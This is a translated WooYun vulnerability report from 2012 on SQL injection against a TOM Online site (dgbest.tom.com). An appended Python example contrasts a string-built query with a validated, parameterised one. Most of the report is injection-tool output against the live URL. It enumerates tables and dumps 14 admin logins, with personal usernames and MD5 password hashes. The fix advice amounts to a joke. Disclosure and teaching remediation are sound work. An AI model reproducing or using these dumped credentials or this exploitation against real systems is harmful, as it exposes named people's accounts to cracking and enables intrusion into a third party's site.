Vulnerability summary

Defect ID: wooyun-2012-07621

Title: TOM site: SQL injection, site-wide XSS and more!!

Vendor: TOM Online

Author: zeracker

Submitted: 2012-05-28 23:22

Fixed: 2012-07-12 23:23

Published: 2012-07-12 23:23

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2012-05-28: Details sent to the vendor, awaiting vendor handling
2012-05-29: Vendor confirmed; details disclosed to the vendor only
2012-06-08: Details disclosed to core white hats and experts in related fields
2012-06-18: Details disclosed to regular white hats
2012-06-28: Details disclosed to intern white hats
2012-07-12: Details disclosed to the public

Summary:

SQL injection
Site-wide XSS
Source code disclosure
etc.

Details:

Injection at http://dgbest.tom.com/article.php?id=33500 (scanner output follows):
Analyzing http://dgbest.tom.com/article.php?id=33500
Host IP: 202.108.13.17
Web Server: Apache/2.2.8 (Fedora)
Powered-by: PHP/5.2.5
Keyword Found: 2
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 13
Injection type is String (')
Valid String Column is 10
Current DB: dgbest
Count(table_name) of information_schema.tables where table_schema=0x646762657374 is 41
Tables found:
dg_comments,dg_index_home,dg_links,dg_ngg_album,dg_ngg_gallery,dg_ngg_pictures,dg_options,dg_postmeta,dg_posts,dg_term_relationships,dg_term_taxonomy,dg_terms,dg_usermeta,dg_users,dgbest_acl,dgbest_ad,dgbest_ad_position,dgbest_ad_record,dgbest_admin,dgbest_application,dgbest_ding,dgbest_ezine,dgbest_ezine_content,dgbest_ezine_flash,dgbest_ezine_read,dgbest_focus,dgbest_gallery,dgbest_gallery_pic,dgbest_links,dgbest_manual_update,dgbest_recommend_category,dgbest_recommend_editor,dgbest_recommend_product,dgbest_recommend_relation,dgbest_recommend_topic,dgbest_right,dgbest_score,dgbest_special,dgbest_timeline,dgbest_tomad,dgbest_vote
Count(column_name) of information_schema.columns where table_schema=0x646762657374 and table_name=0x6467626573745F61646D696E is 3
Columns found: id,user_login,user_pass
Count(*) of dgbest.dgbest_admin is 14
Data Found: id=1
Data Found: user_login=admin
Data Found: user_pass=bfe5e7ac5b9f32f17946ac00ac6f0123
Data Found: id=2
Data Found: user_login=yangming
Data Found: user_pass=91a65eaef41f964d3524479310245b33
Data Found: id=3
Data Found: user_login=wangyingxin
Error (10060): The attempt to connect timed out
Turning off 'bypass illegal union' and retrying!
Data Found: user_pass=628222ffbf2626ac9d8bcea148d55005
Data Found: id=4
Data Found: user_login=dujie
Data Found: user_pass=ca7e85cdc89307977dfc51ff97304857
Data Found: id=5
Data Found: user_login=liangdong
Data Found: user_pass=6cc1c13284d5fee2f9259d0ee645aebd
Data Found: id=6
Data Found: user_login=lixiaochen
Data Found: user_pass=b01909722fa963b9511b6821a2c96e25
Data Found: id=7
Data Found: user_login=sunpeng
Data Found: user_pass=65579ea54311e21d32d15163a36ba7b6
Data Found: id=8
Data Found: user_login=wurong
Data Found: user_pass=cc1bf4721089b6ea8a5daa8c1263ece2
Data Found: id=9
Data Found: user_login=chenfang
Data Found: user_pass=54ab9bca0490effc30025fa7b3324991
Data Found: id=10
Data Found: user_login=lichao
Data Found: user_pass=a382cd40eaf65b6d98f0135e2fa3f016
Data Found: id=11
Data Found: user_login=zhaodandan
Data Found: user_pass=12acce7e5f6c89a80e0fe927f25f0105
Data Found: id=12
Data Found: user_login=haopeng
Data Found: user_pass=3bc9581877e315150ceeddca46623ec6
Data Found: id=13
Data Found: user_login=dongmingchao
Data Found: user_pass=7af12d9b872068e01e7c6882ae146e14
Data Found: id=14
Data Found: user_login=captain
Data Found: user_pass=ab334feeb31c05124cb73fa12571c2f6



XSS: too much hassle to write up.

Proof of vulnerability:


Fix recommendation:

Strengthen the security system.
You know what I mean.
QQ2036234

Copyright notice: please credit the source when reposting, zeracker@WooYun
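The scanner output above reports a "String (')" injection on the id parameter of article.php, and the fix section gives no concrete remediation. The following is an added example, not code from the report or from the TOM site: it shows the query pattern that produces that class of finding beside its hardened form (integer validation plus a bound parameter), using an in-memory sqlite3 database as a stand-in for the site's MySQL backend. The article table, its contents, and the placeholder admin row are constructed for the demonstration.

```python
import re
import sqlite3

# Constructed stand-in for the site's database. Only dgbest_admin and an
# article.php?id= endpoint are named on the page; the rest is assumed here.
SCHEMA = """
CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO article VALUES (33500, 'sample article');
CREATE TABLE dgbest_admin (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO dgbest_admin VALUES (1, 'admin', 'PLACEHOLDER_HASH');
"""


def open_db():
    """Create the constructed in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_article_unsafe(conn, raw_id):
    """The pattern behind a "String (')" finding: the request parameter is
    pasted into a quoted SQL literal, so a quote character in the input
    closes the literal and whatever follows is parsed as SQL."""
    sql = "SELECT id, title FROM article WHERE id='%s'" % raw_id
    return conn.execute(sql).fetchone()


def get_article_safe(conn, raw_id):
    """Hardened form: accept only a plain decimal id, then bind it as a
    query parameter so the database never parses the value as SQL."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return None
    sql = "SELECT id, title FROM article WHERE id=?"
    return conn.execute(sql, (int(raw_id),)).fetchone()


def quote_breaks_query(conn, raw_id):
    """Return True when the unsafe query fails to parse for this input, which
    is the signal a scanner uses to classify the parameter as injectable."""
    try:
        get_article_unsafe(conn, raw_id)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = open_db()
    print(get_article_unsafe(db, "33500"))      # normal request works either way
    print(quote_breaks_query(db, "33500'"))     # True: a quote alters the query
    print(get_article_safe(db, "33500'"))       # None: rejected before the database
```

The validation step matters on its own: with a numeric id the parameter can be rejected before any SQL is built, and the bound parameter covers the cases where input legitimately has to be free text.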


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2012-05-29 09:52

Vendor reply:

Thanks

Latest status:

None